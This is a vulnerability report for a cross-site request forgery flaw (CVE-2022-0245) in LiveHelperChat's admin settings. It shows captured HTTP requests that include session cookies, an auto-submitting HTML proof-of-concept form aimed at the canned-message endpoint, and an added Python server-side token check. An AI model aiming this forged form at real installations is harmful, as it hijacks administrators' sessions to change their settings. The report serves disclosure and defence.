Headline
CVE-2022-0245: Cross-Site Request Forgery (CSRF) in livehelperchat
Cross-Site Request Forgery (CSRF) in GitHub repository livehelperchat/livehelperchat prior to 2.0.
Description
A CSRF issue was found in Settings > Live help configuration > Canned Messages: no CSRF token is passed with the request, and the server performs no CSRF token validation. In addition, statistics are generated through a GET request that carries no CSRF token.
Two more instances where CSRF token validation is not performed were found: one in the notification settings (Settings > Live help configuration > Notification settings) and the other in the group chat options (Settings > Live help configuration > Group chat option).
Proof of Concept
Request for canned messages
POST /site_admin/chat/newcannedmsg HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 526
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/newcannedmsg
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=5j5o8v6g4ut9ci9bsc07kuco6f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Title=abcd&Tags=abcd&ExplainHover=&Delay=0&Position=0&cannedDepartmentGroup=0&Message=&FallbackMessage=&HTMLSnippet=&MessageExtFB=&FallbackMessageExtFB=&repetitiveness=0&active_from=2022-01-13T11%3A41&active_to=2022-01-13T11%3A41&modStartTime=00%3A00&modEndTime=00%3A00&tudStartTime=00%3A00&tudEndTime=00%3A00&wedStartTime=00%3A00&wedEndTime=00%3A00&thdStartTime=00%3A00&thdEndTime=00%3A00&frdStartTime=00%3A00&frdEndTime=00%3A00&sadStartTime=00%3A00&sadEndTime=00%3A00&sudStartTime=00%3A00&sudEndTime=00%3A00&Save_action=Save
You can see that no CSRF token is sent along with the request.
Another request, which generates statistics, is made using the GET method:
GET /site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Request to the notification settings, where no CSRF token validation is performed:
POST /site_admin/notifications/settings HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/notifications/settings
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
csfr_token=&enabled=on&subject=&http_host=demo.livehelperchat.com&icon=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&badge=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&vibrate=&public_key=%22%3E%3Cabcdddd&private_key=%22%3E%3Cabbbcd&StoreOptions=Save
Request to the group chat options, where no CSRF token validation is performed; as in the notification settings request, the csfr_token field is present but empty:
POST /site_admin/groupchat/options HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/groupchat/options
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
csfr_token=&supervisor=3&StoreOptions=Save
Below is an example PoC that exploits the above issues.
CSRF PoC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.livehelperchat.com/site_admin/chat/newcannedmsg" method="POST">
<input type="hidden" name="Title" value="abcd" />
<input type="hidden" name="Tags" value="abcd" />
<input type="hidden" name="ExplainHover" value="" />
<input type="hidden" name="Delay" value="0" />
<input type="hidden" name="Position" value="0" />
<input type="hidden" name="cannedDepartmentGroup" value="0" />
<input type="hidden" name="Message" value="" />
<input type="hidden" name="FallbackMessage" value="" />
<input type="hidden" name="HTMLSnippet" value="" />
<input type="hidden" name="MessageExtFB" value="" />
<input type="hidden" name="FallbackMessageExtFB" value="" />
<input type="hidden" name="repetitiveness" value="0" />
<input type="hidden" name="active_from" value="2022-01-13T11:41" />
<input type="hidden" name="active_to" value="2022-01-13T11:41" />
<input type="hidden" name="modStartTime" value="00:00" />
<input type="hidden" name="modEndTime" value="00:00" />
<input type="hidden" name="tudStartTime" value="00:00" />
<input type="hidden" name="tudEndTime" value="00:00" />
<input type="hidden" name="wedStartTime" value="00:00" />
<input type="hidden" name="wedEndTime" value="00:00" />
<input type="hidden" name="thdStartTime" value="00:00" />
<input type="hidden" name="thdEndTime" value="00:00" />
<input type="hidden" name="frdStartTime" value="00:00" />
<input type="hidden" name="frdEndTime" value="00:00" />
<input type="hidden" name="sadStartTime" value="00:00" />
<input type="hidden" name="sadEndTime" value="00:00" />
<input type="hidden" name="sudStartTime" value="00:00" />
<input type="hidden" name="sudEndTime" value="00:00" />
<input type="hidden" name="Save_action" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact
This vulnerability allows an attacker to create canned messages and to change notification settings and group chat options within an authenticated administrator's session.
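As an added example (not livehelperchat's own code), a server-side check that rejects each request shown above for a different reason: the GET statistics request by its method, the cross-site form PoC by its Sec-Fetch-Site and Origin headers, and the empty or absent csfr_token by the synchronizer token comparison. The function names and the in-memory session store are assumptions made for illustration.

```python
"""CSRF check that would have rejected the captured requests in this report.
Added example, not livehelperchat's own code: the function names and the
in-memory session store are assumptions; the form field name `csfr_token`
is spelled as in the captured request bodies."""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory session store: session id -> CSRF token bound to it.
SESSIONS = {}

def issue_token(session_id):
    """Mint a fresh random token for the session (synchronizer token pattern)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = token
    return token

def csrf_check(method, headers, body, session_id, form_field="csfr_token"):
    """Return (accepted, reason) for a state-changing request. Each of the three
    checks below would, on its own, have blocked the requests in the report."""
    # 1. A GET can be triggered by an <img> or a bare link, so state changes
    #    (e.g. the /statistic?doSearch=1 request) must be POST.
    if method.upper() != "POST":
        return False, "state change via %s" % method.upper()
    # 2. A form auto-submitted from another site arrives with
    #    Sec-Fetch-Site: cross-site and an Origin that differs from Host.
    site = headers.get("Sec-Fetch-Site")
    if site is not None and site not in ("same-origin", "none"):
        return False, "cross-site request (Sec-Fetch-Site=%s)" % site
    origin = headers.get("Origin")
    if origin is not None and urlsplit(origin).netloc != headers.get("Host", ""):
        return False, "origin mismatch"
    # 3. Synchronizer token: the empty `csfr_token=` in the report fails here,
    #    as does a body that omits the field (the canned-message request).
    expected = SESSIONS.get(session_id)
    submitted = parse_qs(body, keep_blank_values=True).get(form_field, [""])[0]
    if not expected or not submitted:
        return False, "missing CSRF token"
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "token mismatch"
    return True, "ok"

if __name__ == "__main__":
    hdrs = {"Host": "demo.livehelperchat.com",
            "Origin": "https://demo.livehelperchat.com", "Sec-Fetch-Site": "same-origin"}
    # Constructed from the report's group chat options request body: empty token.
    print(csrf_check("POST", hdrs, "csfr_token=&supervisor=3&StoreOptions=Save", "sess"))
    print(csrf_check("POST", hdrs, "csfr_token=%s&supervisor=3" % issue_token("sess"), "sess"))
```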